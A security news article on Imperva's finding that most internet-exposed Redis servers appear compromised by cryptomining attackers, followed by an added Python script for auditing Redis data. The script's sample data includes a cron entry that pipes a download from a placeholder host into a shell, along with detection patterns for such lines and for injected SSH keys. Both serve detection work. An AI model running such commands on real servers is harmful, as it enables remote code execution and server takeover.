











Are attackers harnessing your Redis server?


Earlier this year security researchers warned about vulnerable Apache Solr, Redis, and Windows servers hit with cryptominers.

Imperva now says that there are still too many Internet-facing Redis servers and that 75% of them show signs of having been infected with malware.


Testing open Redis servers

“Redis is a great tool, it can serve as in-memory distributed database, cache or a message broker and is widely popular,” the researchers note.

But Redis servers are designed to be accessed by trusted clients inside trusted environments, have no default authentication, and store all data in clear text.

Unfortunately, a simple Shodan search shows that there are 72,000 publicly available ones.

After setting up their own honeypot Redis servers, which within a day started getting probed (vulnerability scans) and bombarded with attacks (simple crypto mining infections and crypto mining worms), the researchers decided to see how many of those open servers hold the malicious keys and values that they saw in their honeypot data.

The result? Only 10,000 of the servers replied to their scan attempts without an error, but of those most showed signs of compromise.

Redis compromise

“Unsurprisingly, more than two-thirds of the open Redis servers contain malicious keys and three-quarters of the servers contain malicious values, suggesting that the server is infected. Also according to our honeypot data, the infected servers with ‘backup’ keys were attacked from a medium-sized botnet located at China (86% of IPs),” the researchers shared.

“In the last month alone, Imperva customers were attacked more than 75k times, by 295 IPs that run publicly available Redis servers. The attacks included SQL injection, cross-site scripting, malicious file uploads, remote code executions etc. These numbers suggest that attackers are harnessing vulnerable Redis servers to mount further attacks on the attacker’s behalf.”

They advise administrators to remove the exposed Redis servers from the Internet and check whether they have been infected. It’s also a good idea to run Redis with the minimal privileges necessary.
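
One way to carry out the infection check advised above, as an added example that is not from the article or from Imperva. The "backup" key name comes from the quoted findings; the value patterns, the configuration checks and the names `audit`, `SAMPLE_ENTRIES` and `SAMPLE_CONFIG` are assumptions of this example, and the sample data is constructed.

```python
import re

# Heuristics chosen for this example (assumptions, not Imperva's indicator list).
VALUE_RULES = [
    ("cron schedule line", re.compile(r"(?m)^\s*(?:[\d*/,-]+\s+){5}\S")),
    ("download piped to a shell",
     re.compile(r"\b(?:curl|wget)\b[^\n|]*\|\s*(?:ba)?sh\b")),
    ("SSH public key", re.compile(r"\bssh-(?:rsa|ed25519)\s+AAAA")),
]
KEY_RULE = re.compile(r"^backup\d*$", re.IGNORECASE)  # 'backup' keys from the article
RISKY_DIRS = ("/var/spool/cron", "/etc/cron", "/.ssh")


def audit(entries, config):
    """Return sorted (item, reason) findings for a Redis key/value dump.

    entries: dict of key -> string value (e.g. collected with SCAN + GET)
    config:  dict holding the CONFIG GET results for 'dir' and 'requirepass'
    """
    findings = set()
    for key, value in entries.items():
        if KEY_RULE.match(key):
            findings.add((key, "key name matches 'backup' pattern"))
        for reason, pattern in VALUE_RULES:
            if pattern.search(value):
                findings.add((key, "value contains " + reason))
    if not config.get("requirepass"):
        findings.add(("config:requirepass", "no password set"))
    if any(d in config.get("dir", "") for d in RISKY_DIRS):
        findings.add(("config:dir", "snapshot directory points at cron or .ssh"))
    return sorted(findings)


# Constructed sample data; the host name is a placeholder.
SAMPLE_ENTRIES = {
    "session:42": '{"user": "alice", "ttl": 3600}',
    "backup1": "\n\n*/2 * * * * curl -fsSL http://placeholder.invalid/i.sh | sh\n\n",
    "greeting": "hello 1 2 3 4 5",
}
SAMPLE_CONFIG = {"dir": "/var/spool/cron", "requirepass": ""}

if __name__ == "__main__":
    for item, reason in audit(SAMPLE_ENTRIES, SAMPLE_CONFIG):
        print(f"{item}: {reason}")
```

A hit is a reason to inspect the host, not proof of infection: legitimate applications can store schedule-like strings or public keys in Redis.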
